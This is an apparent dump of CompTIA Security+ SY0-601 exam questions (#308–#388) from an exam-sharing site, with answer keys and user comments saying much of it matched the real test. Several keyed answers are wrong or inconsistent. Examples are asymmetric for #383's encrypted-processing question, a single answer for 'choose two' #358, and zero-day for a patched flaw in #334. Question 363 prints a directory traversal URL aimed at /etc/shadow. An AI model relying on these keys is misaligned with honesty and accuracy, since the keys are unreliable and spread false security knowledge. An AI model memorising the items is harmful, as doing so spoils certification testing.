I passed today with a 797. 3 of the 4 PBQs I got were on here. I'd say 65% of my questions were on this site, so don't rely on it completely, do
your homework.
upvoted 3 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
Nmap, or Network Mapper, is a network scanning and security auditing tool that is commonly used to discover and map network resources, such
as servers and devices, and to identify the services running on those resources. It can be used to scan a single host or a range of hosts to
determine which ports are open and which services are running on those ports. This information can be used to identify services that may be
unnecessary or potentially insecure, and to take appropriate action to mitigate any security risks. In this case, the administrator can use Nmap to
scan the server and confirm whether there are any unnecessary services running on it.
upvoted 4 times

  stonefaces_kitten 1 month, 2 weeks ago


Agree

me and 2 others just took the test and all passed. For two of us we would say about 40 to 50% is on this dump. For the 3rd guy he said only
about 20%.
upvoted 2 times

  Done461 2 months ago


Selected Answer: A
Weak protocools = nmap
upvoted 2 times

  Blueteam 2 months ago


The answer is A. NMAP will numerate the ports.
upvoted 4 times

  JSOG 2 months ago


Selected Answer: A
my bad, i will say A, didnt read the question well, B will analyse the services running while Nmap will locate the services running
upvoted 2 times

  JSOG 2 months ago


Selected Answer: B
i will with B as A helps find which appliacations are running on the network
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 503/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #308 Topic 1

A vulnerability has been discovered and a known patch to address the vulnerability does not exist. Which of the following controls works BEST
until a proper fix is released?

A. Detective

B. Compensating

C. Deterrent

D. Corrective

Correct Answer: B

Question #309 Topic 1

While reviewing pcap data, a network security analyst is able to locate plaintext usernames and passwords being sent from workstations to
network switches. Which of the following is the security analyst MOST likely observing?

A. SNMP traps

B. A Telnet session

C. An SSH connection

D. SFTP traffic

Correct Answer: B

Question #310 Topic 1

An attacker replaces a digitally signed document with another version that goes unnoticed. Upon reviewing the document’s contents, the author
notices some additional verbiage that was not originally in the document but cannot validate an integrity issue. Which of the following attacks
was used?

A. Cryptomalware

B. Hash substitution

C. Collision

D. Phishing

Correct Answer: B

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 504/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #311 Topic 1

A security analyst notices that specific files are being deleted each time a systems administrator is on vacation. Which of the following BEST
describes the type of malware that is running?

A. Fileless virus

B. Logic bomb

C. Keylogger

D. Ransomware

Correct Answer: B

Question #312 Topic 1

Which of the following involves the inclusion of code in the main codebase as soon as it is written?

A. Continuous monitoring

B. Continuous deployment

C. Continuous validation

D. Continuous integration

Correct Answer: D

Question #313 Topic 1

Which of the following can reduce vulnerabilities by avoiding code reuse?

A. Memory management

B. Stored procedures

C. Normalization

D. Code obfuscation

Correct Answer: D

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 505/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #314 Topic 1

The technology department at a large global company is expanding its Wi-Fi network infrastructure at the headquarters building. Which of the
following should be closely coordinated between the technology, cybersecurity, and physical security departments? Select 1

A. Authentication protocol

B. Encryption type

C. WAP placement

D. VPN configuration

Correct Answer: C

Question #315 Topic 1

Which of the following is an example of risk avoidance?

A. Installing security updates directly in production to expedite vulnerability fixes

B. Buying insurance to prepare for financial loss associated with exploits

C. Not installing new software to prevent compatibility errors

D. Not taking preventive measures to stop the theft of equipment

Correct Answer: C

Question #316 Topic 1

A security administrator needs to block a TCP connection using the corporate firewall. Because this connection is potentially a threat, the
administrator does not want to send back an RST. Which of the following actions in the firewall rule would work BEST?

A. Drop

B. Reject

C. Log alert

D. Permit

Correct Answer: A

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 506/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #317 Topic 1

A security team discovered a large number of company-issued devices with non-work-related software installed. Which of the following policies
would MOST likely contain language that would prohibit this activity?

A. NDA

B. BPA

C. AUP

D. SLA

Correct Answer: C

Question #318 Topic 1

Which of the following BEST describes data streams that are compiled through artificial intelligence that provides insight on current
cyberintrusions, phishing, and other malicious cyberactivity?

A. Intelligence fusion

B. Review reports

C. Log reviews

D. Threat feeds

Correct Answer: D

Question #319 Topic 1

Which of the following would be the BEST resource for a software developer who is looking to improve secure coding practices for web
applications?

A. OWASP

B. Vulnerability scan results

C. NIST CSF

D. Third-party libraries

Correct Answer: A

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 507/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #320 Topic 1

Ann, a customer, received a notification from her mortgage company stating her PII may be shared with partners, affiliates, and associates to
maintain day-to-day business operations. Which of the following documents did Ann receive?

A. An annual privacy notice

B. A non-disclosure agreement

C. A privileged-user agreement

D. A memorandum of understanding

Correct Answer: A

Question #321 Topic 1

A Chief Information Security Officer (CISO) is evaluating the dangers involved in deploying a new ERP system for the company. The CISO
categorizes the system, selects the controls that apply to the system, implements the controls, and then assesses the success of the controls
before authorizing the system. Which of the following is the CISO using to evaluate the environment for this new ERP system?

A. The Diamond Model of Intrusion Analysis

B. CIS Critical Security Controls

C. NIST Risk Management Framework

D. ISO 27002

Correct Answer: C

Question #322 Topic 1

A manufacturing company has several one-off legacy information systems that cannot be migrated to a newer OS due to software compatibility
issues. The OSs are still supported by the vendor, but the industrial software is no longer supported. The Chief Information Security Officer has
created a resiliency plan for these systems that will allow OS patches to be installed in a non-production environment, while also creating backups
of the systems for recovery. Which of the following resiliency techniques will provide these capabilities?

A. Redundancy

B. RAID 1+5

C. Virtual machines

D. Full backups

Correct Answer: C

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 508/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #323 Topic 1

A retail store has a business requirement to deploy a kiosk computer in an open area. The kiosk computer’s operating system has been hardened
and tested. A security engineer is concerned that someone could use removable media to install a rootkit. Which of the following should the
security engineer configure to BEST protect the kiosk computer?

A. Measured boot

B. Boot attestation

C. UEFI

D. EDR

Correct Answer: B

Question #324 Topic 1

A company is implementing MFA for all applications that store sensitive data. The IT manager wants MFA to be non-disruptive and user friendly.
Which of the following technologies should the IT manager use when implementing MFA?

A. One-time passwords

B. Email tokens

C. Push notifications

D. Hardware authentication

Correct Answer: C

Question #325 Topic 1

A security engineer is reviewing the logs from a SAML application that is configured to use MFA. During this review, the engineer notices a high
volume of successful logins that did not require MFA from users who were traveling internationally. The application, which can be accessed
without a VPN, has a policy that allows time-based tokens to be generated. Users who change locations should be required to reauthenticate but
have been able to log in without doing so. Which of the following statements BEST explains the issue?

A. OpenID is mandatory to make the MFA requirements work.

B. An incorrect browser has been detected by the SAML application.

C. The access device has a trusted certificate installed that is overwriting the session token.

D. The user’s IP address is changing between logins, but the application is not invalidating the token.

Correct Answer: D

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 509/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #326 Topic 1

An organization wants to enable built-in FDE on all laptops. Which of the following should the organization ensure is installed on all laptops?

A. TPM

B. CA

C. SAML

D. CRL

Correct Answer: A

Question #327 Topic 1

A security analyst needs to centrally manage credentials and permissions to the company’s network devices. The following security requirements
must be met:

• All actions performed by the network staff must be logged.


• Per-command permissions must be possible.
• The authentication server and the devices must communicate through TCP.

Which of the following authentication protocols should the analyst choose?

A. Kerberos

B. CHAP

C. TACACS+

D. RADIUS

Correct Answer: C

Question #328 Topic 1

An organization recently released a software assurance policy that requires developers to run code scans each night on the repository. After the
first night, the security team alerted the developers that more than 2,000 findings were reported and need to be addressed. Which of the following
is the MOST likely cause for the high number of findings?

A. The vulnerability scanner was not properly configured and generated a high number of false positives.

B. Third-party libraries have been loaded into the repository and should be removed from the codebase.

C. The vulnerability scanner found several memory leaks during runtime, causing duplicate reports for the same issue.

D. The vulnerability scanner was not loaded with the correct benchmarks and needs to be updated.

Correct Answer: A

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 510/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #329 Topic 1

An organization is concerned about intellectual property theft by employees who leave the organization. Which of the following should the
organization MOST likely implement?

A. CBT

B. NDA

C. MOU

D. AUP

Correct Answer: B

Question #330 Topic 1

A security analyst reviews web server logs and notices the following lines:

Which of the following vulnerabilities is the attacker trying to exploit?

A. Token reuse

B. SQLi

C. CSRF

D. XSS

Correct Answer: D

Question #331 Topic 1

A network manager is concerned that business may be negatively impacted if the firewall in its data center goes offline. The manager would like to
implement a high availability pair to:

A. decrease the mean time between failures.

B. remove the single point of failure.

C. cut down the mean time to repair.

D. reduce the recovery time objective.

Correct Answer: B

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 511/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #332 Topic 1

A major manufacturing company updated its internal infrastructure and just recently started to allow OAuth applications to access corporate data.
Data leakage is now being reported. Which of the following MOST likely caused the issue?

A. Privilege creep

B. Unmodified default settings

C. TLS protocol vulnerabilities

D. Improper patch management

Correct Answer: B

Question #333 Topic 1

While preparing a software inventory report, a security analyst discovers an unauthorized program installed on most of the company’s servers. The
program utilizes the same code signing certificate as an application deployed to only the accounting team. After removing the unauthorized
program, which of the following mitigations should the analyst implement to BEST secure the server environment?

A. Revoke the code signing certificate used by both programs.

B. Block all unapproved file hashes from installation

C. Add the accounting application file hash to the allowed list.

D. Update the code signing certificate for the approved application.

Correct Answer: A

Question #334 Topic 1

A security analyst is reviewing the latest vulnerability scan report for a web server following an incident. The vulnerability report showed no
concerning findings. The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and a patch is available
for the vulnerability. Which of the following is the MOST likely cause?

A. Security patches failed to install due to a version incompatibility.

B. An adversary altered the vulnerability scan reports.

C. A zero-day vulnerability was used to exploit the web server.

D. The scan reported a false negative for the vulnerability.

Correct Answer: C

  VHuckle 20 hours, 12 minutes ago


The answer cannot be C, as the definition of a zero-day exploit is one for which no patch is yet available. The question clearly states that a patch
is available.
upvoted 1 times

  VHuckle 20 hours, 11 minutes ago


I'm going with D, that the scan delivered a false negative. Willing to be corrected if that's not the proper answer.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 512/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #335 Topic 1

The help desk has received calls from users in multiple locations who are unable to access core network services. The network team has
identified and turned off the network switches using remote commands. Which of the following actions should the network team take NEXT?

A. Disconnect all external network connections from the firewall.

B. Send response teams to the network switch locations to perform updates.

C. Turn on all the network switches by using the centralized management software.

D. Initiate the organization's incident response plan.

Correct Answer: D

Question #336 Topic 1

An attacker is trying to gain access by installing malware on a website that is known to be visited by the target victims. Which of the following is
the attacker MOST likely attempting?

A. A spear-phishing attack

B. A watering-hole attack

C. Typo squatting

D. A phishing attack

Correct Answer: B

  VHuckle 20 hours, 8 minutes ago


Selected Answer: B
Watering-holes target specific audiences.
upvoted 1 times

Question #337 Topic 1

An organization is moving away from the use of client-side and server-side certificates for EAP. The company would like for the new EAP solution
to have the ability to detect rogue access points. Which of the following would accomplish these requirements?

A. PEAP

B. EAP-FAST

C. EAP-TLS

D. EAP-TTLS

Correct Answer: B

Currently there are no comments in this discussion, be the first to comment!

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 513/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #338 Topic 1

A security analyst receives a SIEM alert that someone logged in to the appadmin test account, which is only used for the early detection of
attacks. The security analyst then reviews the following application log:

Which of the following can the security analyst conclude?

A. A replay attack is being conducted against the application.

B. An injection attack is being conducted against a user authentication system.

C. A service account password may have been changed, resulting in continuous failed logins within the application.

D. A credentialed vulnerability scanner attack is testing several CVEs against the application.

Correct Answer: B

Question #339 Topic 1

A security team is engaging a third-party vendor to do a penetration test of a new proprietary application prior to its release. Which of the
following documents would the third-party vendor MOST likely be required to review and sign?

A. SLA

B. NDA

C. MOU

D. AUP

Correct Answer: B

Question #340 Topic 1

Which of the following is an administrative control that would be MOST effective to reduce the occurrence of malware execution?

A. Security awareness training

B. Frequency of NIDS updates

C. Change control procedures

D. EDR reporting cycle

Correct Answer: C

  Msc0009 22 hours, 28 minutes ago


Selected Answer: A
it must be A
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 514/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #341 Topic 1

Employees at a company are receiving unsolicited text messages on their corporate cell phones. The unsolicited text messages contain a
password reset link. Which of the following attacks is being used to target the company?

A. Phishing

B. Vishing

C. Smishing

D. Spam

Correct Answer: C

Question #342 Topic 1

During a Chief Information Security Officer (CISO) convention to discuss security awareness, the attendees are provided with a network
connection to use as a resource. As the convention progresses, one of the attendees starts to notice delays in the connection, and the HTTPS site
requests are reverting to HTTP. Which of the following BEST describes what is happening?

A. Birthday collision on the certificate key

B. DNS hijacking to reroute traffic

C. Brute force to the access point

D. A SSL/TLS downgrade

Correct Answer: D

Question #343 Topic 1

A user enters a password to log in to a workstation and is then prompted to enter an authentication code. Which of the following MFA factors or
attributes are being utilized in the authentication process? (Choose two.)

A. Something you know

B. Something you have

C. Somewhere you are

D. Someone you know

E. Something you are

F. Something you can do

Correct Answer: AB

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 515/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #344 Topic 1

A company uses specially configured workstations for any work that requires administrator privileges to its Tier 0 and Tier 1 systems. The
company follows a strict process to harden systems immediately upon delivery. Even with these strict security measures in place, an incident
occurred from one of the workstations. The root cause appears to be that the SoC was tampered with or replaced. Which of the following MOST
likely occurred?

A. Fileless malware

B. A downgrade attack

C. A supply-chain attack

D. A logic bomb

E. Misconfigured BIOS

Correct Answer: C

Question #345 Topic 1

Audit logs indicate an administrative account that belongs to a security engineer has been locked out multiple times during the day. The security
engineer has been on vacation for a few days. Which of the following attacks can the account lockout be attributed to?

A. Backdoor

B. Brute-force

C. Rootkit

D. Trojan

Correct Answer: B

Question #346 Topic 1

A security analyst is reviewing the output of a web server log and notices a particular account is attempting to transfer large amounts of money:

Which of the following types of attacks is MOST likely being conducted?

A. SQLi

B. CSRF

C. Spear phishing

D. API

Correct Answer: B

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 516/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #347 Topic 1

After installing a patch on a security appliance, an organization realized a massive data exfiltration had occurred. Which of the following BEST
describes the incident?

A. Supply chain attack

B. Ransomware attack

C. Cryptographic attack

D. Password attack

Correct Answer: A

Question #348 Topic 1

A security analyst reviews web server logs and notices the following lines:

Which of the following vulnerabilities has the attacker exploited? (Choose two.)

A. Race condition

B. LFI

C. Pass the hash

D. XSS

E. RFI

F. Directory traversal

Correct Answer: BF

Question #349 Topic 1

An information security manager for an organization is completing a PCI DSS self-assessment for the first time. Which of the following is the
MOST likely reason for this type of assessment?

A. An international expansion project is currently underway.

B. Outside consultants utilize this tool to measure security maturity.

C. The organization is expecting to process credit card information.

D. A government regulator has requested this audit to be completed.

Correct Answer: C

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 517/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #350 Topic 1

Physical access to the organization's servers in the data center requires entry and exit through multiple access points: a lobby, an access control
vestibule, three doors leading to the server floor, a door to the server floor itself, and eventually to a caged area solely for the organization’s
hardware. Which of the following controls is described in this scenario?

A. Compensating

B. Deterrent

C. Preventive

D. Detective

Correct Answer: C

Question #351 Topic 1

A new security engineer has started hardening systems. One of the hardening techniques the engineer is using involves disabling remote logins to
the NAS. Users are now reporting the inability to use SCP to transfer files to the NAS, even though the data is still viewable from the users’ PCs.
Which of the following is the MOST likely cause of this issue?

A. TFTP was disabled on the local hosts.

B. SSH was turned off instead of modifying the configuration file.

C. Remote login was disabled in the networkd.conf instead of using the sshd.conf.

D. Network services are no longer running on the NAS.

Correct Answer: B

Question #352 Topic 1

An enterprise has hired an outside security firm to conduct penetration testing on its network and applications. The firm has been given the
documentation only available to the customers of the applications. Which of the following BEST represents the type of testing that will occur?

A. Bug bounty

B. Black-box

C. Gray-box

D. White-box

Correct Answer: C

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 518/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #353 Topic 1

A network engineer and a security engineer are discussing ways to monitor network operations. Which of the following is the BEST method?

A. Disable Telnet and force SSH.

B. Establish a continuous ping.

C. Utilize an agentless monitor.

D. Enable SNMPv3 with passwords.

Correct Answer: C

Question #354 Topic 1

A security analyst is looking for a solution to help communicate to the leadership team the severity levels of the organization’s vulnerabilities.
Which of the following would BEST meet this need?

A. CVE

B. SIEM

C. SOAR

D. CVSS

Correct Answer: D

Question #355 Topic 1

A company is switching to a remote work model for all employees. All company and employee resources will be in the cloud. Employees must use
their personal computers to access the cloud computing environment. The company will manage the operating system. Which of the following
deployment models is the company implementing?

A. CYOD

B. MDM

C. COPE

D. VDI

Correct Answer: C

  VHuckle 19 hours, 54 minutes ago


Selected Answer: D
The answer cannot be C. By definition, COPE (corporate-owned personally enabled) is a business model in which an organization provides its
employees with mobile computing devicesand allows the employees to use them as if they were personally owned notebook computers, tablets
or smartphones.

The question explicitly states that users must use their personal equipment, not company-provided. The only logical answer in that scenario is
VDI (Virtual Desktop Infrastructure - a technology that refers to the use of virtual machines to provide and manage virtual desktops.)
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 519/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #356 Topic 1

A security administrator needs to inspect in-transit files on the enterprise network to search for PII, credit card data, and classification words.
Which of the following would be the BEST to use?

A. IDS solution

B. EDR solution

C. HIPS software solution

D. Network DLP solution

Correct Answer: D

Question #357 Topic 1

The Chief Executive Officer announced a new partnership with a strategic vendor and asked the Chief Information Security Officer to federate user
digital identities using SAML-based protocols. Which of the following will this enable?

A. SSO

B. MFA

C. PKI

D. DLP

Correct Answer: A

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 520/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #358 Topic 1

An employee’s company account was used in a data breach. Interviews with the employee revealed:

• The employee was able to avoid changing passwords by using a previous password again.
• The account was accessed from a hostile, foreign nation, but the employee has never traveled to any other countries.

Which of the following can be implemented to prevent these issues from reoccurring? (Choose two.)

A. Geographic dispersal

B. Password complexity

C. Password history

D. Geotagging

E. Password lockout

F. Geofencing

Correct Answer: B

  VHuckle 19 hours, 51 minutes ago


Selected Answer: C
Question states to choose 2. Correct answer is CF.
C - User bypassed changing passwords by using a previously used pwd.
F - User has never travelled to another country, so geofencing will limit access to current location.
upvoted 2 times

Question #359 Topic 1

A large industrial system’s smart generator monitors the system status and sends alerts to third-party maintenance personnel when critical
failures occur. While reviewing the network logs, the company’s security manager notices the generator’s IP is sending packets to an internal file
server’s IP. Which of the following mitigations would be BEST for the security manager to implement while maintaining alerting capabilities?

A. Segmentation

B. Firewall allow list

C. Containment

D. Isolation

Correct Answer: B

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 521/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #360 Topic 1

Which of the following technologies is used to actively monitor for specific file types being transmitted on the network?

A. File integrity monitoring

B. Honeynets

C. Tcpreplay

D. Data loss prevention

Correct Answer: D

Question #361 Topic 1

As part of the building process for a web application, the compliance team requires that all PKI certificates are rotated annually and can only
contain wildcards at the secondary subdomain level. Which of the following certificate properties will meet these requirements?

A. HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

B. HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

C. HTTPS://*.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

D. HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2023

Correct Answer: C

Question #362 Topic 1

A global pandemic is forcing a private organization to close some business units and reduce staffing at others. Which of the following would be
BEST to help the organization's executives determine their next course of action?

A. An incident response plan

B. A communication plan

C. A disaster recovery plan

D. A business continuity plan

Correct Answer: D

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 522/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #363 Topic 1

A cybersecurity analyst reviews the log files from a web server and sees a series of files that indicate a directory traversal attack has occurred.
Which of the following is the analyst MOST likely seeing?

A. http://sample.url.com/

B. http://sample.url.com/someotherpageonsite/../../../etc/shadow

C. http://sample.url.com/select-from-database-where-password-null

D. http://redirect.sameple.url.sampleurl.com/malicious-dns-redirect

Correct Answer: B

Question #364 Topic 1

A candidate attempts to go to http://comptia.org but accidentally visits http://comptiia.org. The malicious website looks exactly like the legitimate
website. Which of the following BEST describes this type of attack?

A. Reconnaissance

B. Impersonation

C. Typosquatting

D. Watering-hole

Correct Answer: C

Question #365 Topic 1

The marketing department at a retail company wants to publish an internal website to the internet so it is reachable by a limited number of
specific, external service providers in a secure manner. Which of the following configurations would be BEST to fulfil this requirement?

A. NAC

B. ACL

C. WAF

D. NAT

Correct Answer: B

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 523/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #366 Topic 1

A retail executive recently accepted a job with a major competitor. The following week, a security analyst reviews the security logs and identifies
successful logon attempts to access the departed executive’s accounts. Which of the following security practices would have addressed the
issue?

A. A non-disclosure agreement

B. Least privilege

C. An acceptable use policy

D. Offboarding

Correct Answer: D

Question #367 Topic 1

A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and operated by an outdated and unsupported
specialized Windows OS. Which of the following is MOST likely preventing the IT manager at the hospital from upgrading the specialized OS?

A. The time needed for the MRI vendor to upgrade the system would negatively impact patients.

B. The MRI vendor does not support newer versions of the OS.

C. Changing the OS breaches a support SLA with the MRI vendor.

D. The IT team does not have the budget required to upgrade the MRI scanner.

Correct Answer: B

Question #368 Topic 1

A company received a “right to be forgotten” request. To legally comply, the company must remove data related to the requester from its systems.
Which of the following is the company MOST likely complying with?

A. NIST CSF

B. GDPR

C. PCI DSS

D. ISO 27001

Correct Answer: B

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 524/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #369 Topic 1

A security team suspects that the cause of recent power consumption overloads is the unauthorized use of empty power outlets in the network
rack. Which of the following options will mitigate this issue without compromising the number of outlets available?

A. Adding a new UPS dedicated to the rack

B. Installing a managed PDU

C. Using only a dual power supplies unit

D. Increasing power generator capacity

Correct Answer: B

Question #370 Topic 1

An engineer wants to inspect traffic to a cluster of web servers in a cloud environment. Which of the following solutions should the engineer
implement?

A. CASB

B. WAF

C. Load balancer

D. VPN

Correct Answer: C

Question #371 Topic 1

A security analyst needs to implement an MDM solution for BYOD users that will allow the company to retain control over company emails
residing on the devices and limit data exfiltration that might occur if the devices are lost or stolen. Which of the following would BEST meet these
requirements? (Choose two.)

A. Full device encryption

B. Network usage rules

C. Geofencing

D. Containerization

E. Application approve list

F. Remote control

Correct Answer: DF

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 525/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #372 Topic 1

A security administrator is evaluating remote access solutions for employees who are geographically dispersed. Which of the following would
provide the MOST secure remote access? (Choose two.)

A. IPSec

B. SFTP

C. SRTP

D. LDAPS

E. S/MIME

F. SSL VPN

Correct Answer: A, F

Question #373 Topic 1

A malicious actor recently penetrated a company's network and moved laterally to the data center. Upon investigation, a forensics firm wants to
know what was in the memory on the compromised server. Which of the following files should be given to the forensics firm?

A. Security

B. Application

C. Dump

D. Syslog

Correct Answer: C

Question #374 Topic 1

A company is looking to migrate some servers to the cloud to minimize its technology footprint. The company has a customer relationship
management system on premises. Which of the following solutions will require the LEAST infrastructure and application support from the
company?

A. SaaS

B. IaaS

C. PaaS

D. SDN

Correct Answer: A

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 526/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #375 Topic 1

A network administrator needs to determine the sequence of a server farm’s logs. Which of the following should the administrator consider?
(Choose two.)

A. Chain of custody

B. Tags

C. Reports

D. Time stamps

E. Hash values

F. Time offset

Correct Answer: DE

  VHuckle 18 hours, 49 minutes ago


Selected Answer: DF
Hashing makes no sense, as it has nothing with the order in which the logs are captured. Time stamps and the time offset (think time zones) will
definitely impact the order in which they are displayed.
upvoted 1 times

Question #376 Topic 1

Which of the following is the BEST reason to maintain a functional and effective asset management policy that aids in ensuring the security of an
organization?

A. To provide data to quantify risk based on the organization's systems

B. To keep all software and hardware fully patched for known vulnerabilities

C. To only allow approved, organization-owned devices onto the business network

D. To standardize by selecting one laptop model for all users in the organization

Correct Answer: C

Question #377 Topic 1

A security administrator, who is working for a government organization, would like to utilize classification and granular planning to secure top
secret data and grant access on a need-to-know basis. Which of the following access control schemas should the administrator consider?

A. Mandatory

B. Rule-based

C. Discretionary

D. Role-based

Correct Answer: D

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 527/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #378 Topic 1

An organization is outlining data stewardship roles and responsibilities. Which of the following employee roles would determine the purpose of
data and how to process it?

A. Data custodian

B. Data controller

C. Data protection officer

D. Data processor

Correct Answer: B

Question #379 Topic 1

Multiple beaconing activities to a malicious domain have been observed. The malicious domain is hosting malware from various endpoints on the
network. Which of the following technologies would be BEST to correlate the activities between the different endpoints?

A. Firewall

B. SIEM

C. IPS

D. Protocol analyzer

Correct Answer: B

Question #380 Topic 1

Which of the following types of controls is a turnstile?

A. Physical

B. Detective

C. Corrective

D. Technical

Correct Answer: A

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 528/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #381 Topic 1

Users report access to an application from an internal workstation is still unavailable to a specific server, even after a recent firewall rule
implementation that was requested for this access. ICMP traffic is successful between the two devices. Which of the following tools should the
security analyst use to help identify if the traffic is being blocked?

A. nmap

B. tracert

C. ping

D. ssh

Correct Answer: B

Question #382 Topic 1

As part of annual audit requirements, the security team performed a review of exceptions to the company policy that allows specific users the
ability to use USB storage devices on their laptops. The review yielded the following results:

• The exception process and policy have been correctly followed by the majority of users.
• A small number of users did not create tickets for the requests but were granted access.
• All access had been approved by supervisors.
• Valid requests for the access sporadically occurred across multiple departments.
• Access, in most cases, had not been removed when it was no longer needed.

Which of the following should the company do to ensure that appropriate access is not disrupted but unneeded access is removed in a reasonable
time frame?

A. Create an automated, monthly attestation process that removes access if an employee’s supervisor denies the approval.

B. Remove access for all employees and only allow new access to be granted if the employee’s supervisor approves the request.

C. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team.

D. Implement a ticketing system that tracks each request and generates reports listing which employees actively use USB storage devices.

Correct Answer: C

Question #383 Topic 1

A financial institution would like to store its customer data in a cloud but still allow the data to be accessed and manipulated while encrypted.
Doing so would prevent the cloud service provider from being able to decipher the data due to its sensitivity. The financial institution is not
concerned about computational overheads and slow speeds. Which of the following cryptographic techniques would BEST meet the requirement?

A. Asymmetric

B. Symmetric

C. Homomorphic

D. Ephemeral

Correct Answer: A

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 529/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #384 Topic 1

A cryptomining company recently deployed a new antivirus application to all of its mining systems. The installation of the antivirus application
was tested on many personal devices, and no issues were observed. Once the antivirus application was rolled out to the servers, constant issues
were reported. As a result, the company decided to remove the mining software. The antivirus application was MOST likely classifying the
software as:

A. a rootkit.

B. a PUP.

C. a backdoor.

D. ransomware.

E. a RAT.

Correct Answer: B

Question #385 Topic 1

A cybersecurity administrator is using iptables as an enterprise firewall. The administrator created some rules, but the network now seems to be
unresponsive. All connections are being dropped by the firewall. Which of the following would be the BEST option to remove the rules?

A. # iptables -t mangle -X

B. # iptables -F

C. # iptables -Z

D. # iptables -P INPUT -j DROP

Correct Answer: B

Question #386 Topic 1

An incident response technician collected a mobile device during an investigation. Which of the following should the technician do to maintain
chain of custody?

A. Document the collection and require a sign-off when possession changes.

B. Lock the device in a safe or other secure location to prevent theft or alteration.

C. Place the device in a Faraday cage to prevent corruption of the data.

D. Record the collection in a blockchain-protected public ledger.

Correct Answer: A

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 530/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #387 Topic 1

A company recently implemented a patch management policy; however, vulnerability scanners have still been flagging several hosts, even after the
completion of the patch process. Which of the following is the MOST likely cause of the issue?

A. The vendor firmware lacks support.

B. Zero-day vulnerabilities are being discovered.

C. Third-party applications are not being patched.

D. Code development is being outsourced.

Correct Answer: C

Question #388 Topic 1

Which of the following controls would provide the BEST protection against tailgating?

A. Access control vestibule

B. Closed-circuit television

C. Proximity card reader

D. Faraday cage

Correct Answer: C

